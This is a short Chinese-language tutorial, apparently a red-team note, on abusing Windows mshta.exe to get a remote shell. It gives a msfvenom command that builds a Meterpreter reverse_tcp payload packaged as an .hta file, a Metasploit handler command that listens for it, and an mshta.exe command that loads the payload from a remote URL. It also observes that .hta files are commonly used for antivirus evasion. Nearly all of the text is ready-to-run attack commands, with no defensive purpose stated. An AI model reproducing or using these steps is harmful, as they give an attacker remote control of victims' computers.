1. 概述
Mshta.exe是微软Windows操作系统相关程序,英⽂全称Microsoft HTML
Application,可翻译为微软超⽂本标记语⾔应⽤,⽤于执⾏.HTA文件。 ⽬前正常的hta⽂件⽤到的很少,偶尔见到了很可能就是恶意软件,很多免杀⼯具都 是对shellcode进⾏处理后生产.hta⽂件,在windows下可以直接执行。
2. 利用
2.1 生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 lport=1234 -f hta-psh -o 1234.hta
2.2 监听
handler -H 192.168.1.4 -P 1234 -p windows/meterpreter/reverse_tcp
2.3 执行上线
2.3.1 本地运行
2.3.2 远程加载
远程加载的话直接使用mshta加载就可以了
mshta.exe http://x.x.x.x/x.hta